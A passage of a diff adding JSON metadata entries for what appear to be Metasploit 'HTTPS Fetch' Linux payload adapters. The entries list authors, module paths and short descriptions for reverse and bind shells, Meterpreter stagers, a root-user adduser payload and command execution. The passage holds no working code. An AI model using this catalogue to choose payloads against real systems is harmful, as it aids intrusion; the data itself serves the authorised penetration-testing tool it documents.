"/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/pingback_reverse_tcp": { + "name": "HTTPS Fetch, Linux x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/shell/bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + 
"rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/https/x64/shell/reverse_sctp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/https/x64/shell/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/https/x64/shell/reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x64/shell/reverse_tcp", + 
"aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/https/x64/shell_bind_ipv6_tcp": { + "name": "HTTPS Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/https/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + 
"adapted_refname": "linux/x64/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/shell_bind_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/https/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/shell_bind_tcp_random_port": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/https/x64/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Geyslan G. 
Bem " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/https/x64/shell_find_port": { + "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/https/x64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "mak" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_find_port", + "staged": 
false + }, + "payload_cmd/linux/https/x64/shell_reverse_ipv6_tcp": { + "name": "HTTPS Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/https/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/https/x64/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": 
false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x64", + "adapted_refname": "linux/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/adduser": { + "name": "HTTPS Fetch, Linux Add User", + "fullname": "payload/cmd/linux/https/x86/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "vlad902 ", + "spoonm " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/adduser", + "staged": false + }, + "payload_cmd/linux/https/x86/chmod": { + "name": "HTTPS Fetch, Linux Chmod", + "fullname": "payload/cmd/linux/https/x86/chmod", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nRuns chmod on specified file with specified mode", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/chmod", + "check": false, + "post_auth": false, + 
"default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/chmod", + "staged": false + }, + "payload_cmd/linux/https/x86/exec": { + "name": "HTTPS Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/https/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "vlad902 ", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/exec", + "staged": false + }, + "payload_cmd/linux/https/x86/generic/debug_trap": { + "name": "HTTPS Fetch, Generic x86 Debug Trap", + "fullname": "payload/cmd/linux/https/x86/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "robert " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nGenerate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "generic/debug_trap", + "staged": false + }, + "payload_cmd/linux/https/x86/generic/tight_loop": { + "name": "HTTPS Fetch, Generic x86 Tight Loop", + "fullname": "payload/cmd/linux/https/x86/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "jduck " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nGenerate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/generic/tight_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "generic/tight_loop", + "staged": false + }, + "payload_cmd/linux/https/x86/meterpreter/bind_ipv6_tcp": { + "name": "HTTPS Fetch, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt " + 
], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid": { + "name": "HTTPS Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + 
"adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/https/x86/meterpreter/bind_nonx_tcp": { + "name": "HTTPS Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/bind_tcp": { + "name": "HTTPS Fetch, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/bind_tcp_uuid": { + "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/https/x86/meterpreter/find_tag": { + "name": "HTTPS Fetch, Find Tag Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/find_tag", + "aliases": 
[], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nUse an established connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/find_tag", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + 
"adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/reverse_nonx_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/https/x86/meterpreter/reverse_tcp_uuid": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/https/x86/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": 
"payload/cmd/linux/https/x86/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/https/x86/meterpreter_reverse_https": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/x86/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_https", + "staged": 
